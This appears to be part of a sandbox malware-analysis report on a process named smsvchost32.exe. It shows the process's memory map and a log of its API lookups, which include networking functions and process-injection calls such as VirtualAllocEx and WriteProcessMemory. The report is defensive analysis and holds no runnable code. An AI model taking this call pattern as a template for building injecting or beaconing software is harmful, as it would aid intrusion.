| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00511fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00531fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00541fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00560fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x00570fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005c2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x00626fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00610fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x00620000 | 0x00620fff | Memory Mapped File | rw |
|
|
|
|
| pagefile_0x0000000000630000 | 0x00630000 | 0x00630fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x00b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x01f5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x0205ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02070000 | 0x023a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0272ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x0276ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c46fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d70000 | 0x02d70000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02ec6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002eb0000 | 0x02eb0000 | 0x02eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ec0000 | 0x02ec0000 | 0x02ec1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f10000 | 0x02f10000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0304ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0318ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x032a6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x032cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033d0000 | 0x033d0000 | 0x033e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000033d0000 | 0x033d0000 | 0x033d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000033e0000 | 0x033e0000 | 0x037dafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037e0000 | 0x037e0000 | 0x037f6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037e0000 | 0x037e0000 | 0x037e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037f0000 | 0x037f0000 | 0x03806fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff20000 | 0x6ff32fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 16 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x938
242
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\eappcfg.dll, base_address = 0x6ffa0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Handle | module_name = WININET.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Module | Get Handle | module_name = PSAPI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Module | Get Handle | module_name = USERENV.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ws2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Handle | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x70210000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Module | Get Handle | module_name = NETAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = NETAPI32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
